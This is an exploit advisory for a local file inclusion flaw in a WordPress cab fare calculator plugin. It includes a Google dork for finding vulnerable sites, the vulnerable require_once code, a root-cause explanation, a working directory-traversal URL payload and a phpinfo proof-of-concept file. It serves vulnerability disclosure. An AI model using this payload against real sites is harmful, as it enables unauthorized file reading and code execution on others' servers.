# Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion
# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/
# Date: 24-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/
# Version: 1.0.3
# Tested on: Firefox
# Vulnerable File: tblight.php
# Impact: Local File Read / Code Execution

# Vulnerable Code:

if(!empty($_GET['controller']) && !empty($_GET['action']) && !empty($_GET['ajax']) && $_GET['ajax'] == 1) {
    require_once('' . 'controllers/'.$_GET['controller'].'.php');
}

# Root cause: the user-controlled `controller` query parameter is concatenated straight into the `require_once` path with no allow-list of valid controller names and no directory-traversal check, so `..` sequences escape the `controllers/` directory and any `.php` file readable by the web server process is included and executed.

# Proof of concept:
http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1

# POC Code Execution: /etc/index.php:
<?php echo "Local file read"; phpinfo(); ?>